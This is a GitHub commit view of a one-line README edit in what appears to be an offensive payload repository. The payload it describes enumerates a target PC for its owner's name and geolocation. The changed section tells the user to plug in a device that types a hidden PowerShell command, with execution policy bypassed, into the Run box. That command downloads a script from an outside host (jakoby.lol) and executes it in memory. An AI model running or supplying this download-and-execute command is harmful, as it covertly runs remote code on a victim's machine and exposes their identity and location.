Update README.md

This commit is contained in:
I-Am-Jakoby 2023-01-14 11:01:45 -06:00 committed by GitHub
parent ea6f1130aa
commit d2f6afa317
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -34,7 +34,7 @@ This program enumerates a target PC to get their Name, GeoLocation (Latitude and
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
* Invoke-RestMethod will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -Ep Bypass irm jakoby.lol/b8n | iex
```